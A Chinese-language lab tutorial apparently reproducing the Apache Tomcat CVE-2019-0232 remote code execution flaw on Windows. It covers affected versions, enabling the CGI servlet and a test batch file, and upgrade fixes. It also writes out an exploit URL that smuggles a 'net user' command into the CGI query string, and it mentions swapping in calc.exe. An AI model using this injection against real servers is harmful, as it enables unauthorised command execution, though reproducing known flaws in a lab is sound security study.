中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

發布時間:2021-12-28 20:21:22 來源:億速云 閱讀:441 作者:柒染 欄目:安全技術

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

0x00簡介

Tomcat 服務器是一個免費的開放源代碼的Web 應用服務器,屬于輕量級應用服務器,在中小型系統和并發訪問用戶不是很多的場合下被普遍使用,是開發和調試JSP 程序的首選。對于一個初學者來說,可以這樣認為,當在一臺機器上配置好Apache 服務器,可利用它響應HTML(標準通用標記語言下的一個應用)頁面的訪問請求。實際上Tomcat是Apache 服務器的擴展,但運行時它是獨立運行的,所以當你運行tomcat 時,它實際上作為一個與Apache 獨立的進程單獨運行的。

0x01漏洞概述

該漏洞只對Windows平臺有效,攻擊者向CGI Servlet發送請求,可在具有Apache Tomcat權限的系統上注入和執行任意操作系統命令。漏洞成因是當將參數從JRE傳遞到Windows環境時,由于CGI_Servlet中的輸入驗證錯誤而存在該漏洞。

0x02影響范圍

Apache Tomcat 9.0.0.M1 to 9.0.17

Apache Tomcat 8.5.0 to 8.5.39

Apache Tomcat 7.0.0 to 7.0.93

0x03環境搭建

環境:Java8+Apache Tomcat 8.5.39

1.安裝tomcat需要java8環境,jdk下載地址:

https://www.oracle.com/java/technologies/javase-downloads.html

2.下載完成后雙擊安裝,一直點擊下一步知道安裝完成。

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

2.在系統環境變量中新建JAVA_HOME添加java安裝路徑,然后在Path變量編輯添加%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

3.安裝tomcat8.5.39版本,下載地址:

https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/bin/

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

4.下載完成后解壓出來配置tomcat,打開Tomcat安裝目錄的apache-tomcat-8.5.39\conf\web.xml把取消以下兩項的注釋,否則訪問cgi目錄會提示404,在默認情況下配置是注釋的。

<servlet>

<servlet-name>cgi</servlet-name>

<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>

<init-param>

<param-name>debug</param-name>

<param-value>0</param-value>

</init-param>

<init-param>

<param-name>cgiPathPrefix</param-name>

<param-value>WEB-INF/cgi-bin</param-value>

</init-param>

<init-param>

<param-name>executable</param-name>

<param-value></param-value>

</init-param>

<load-on-startup>5</load-on-startup>

</servlet>

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

5.然后修改在conf/context.xml中的<Context>添加privileged="true"語句

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

6.在apache-tomcat-8.5.39\webapps\ROOT\WEB-INF下創建一個cgi-bin文件夾,并在文件夾內創建一個bat文件寫入以下代碼

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

7.都配置完成后進入apache-tomcat-8.5.39-src\bin下運行startup.bat啟動tomcat

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

8.在瀏覽器輸入http://your-ip:8080看到以下頁面表示安裝成功

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

0x04漏洞復現

1.在瀏覽器訪問http://your-ip/cgi-bin/test.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user,執行net user 命令

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

2.把后面的命令修改成calc.exe彈出計算器

如何進行Apache Tomcat遠程代碼執行漏洞CVE-2019-0232復現

0x05漏洞修復

建議將受影響版本的用戶應該應用下列其中一項緩解。升級到:

Apache Tomcat 9.0.18或更高版本

Apache Tomcat 8.5.40或更高版本

Apache Tomcat 7.0.93或更高版本

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

潼南县| 三亚市| 濉溪县| 汽车| 中超| 巴里| 虹口区| 宣城市| 五莲县| 武邑县| 石泉县| 金山区| 兴义市| 和顺县| 龙海市| 清涧县| 逊克县| 潮州市| 东城区| 武乡县| 林州市| 青神县| 天峻县| 通州区| 内丘县| 新疆| 台中市| 如东县| 黄浦区| 余干县| 鄱阳县| 建瓯市| 柳林县| 玛曲县| 宜宾县| 德化县| 体育| 平江县| 黄石市| 朝阳县| 华坪县|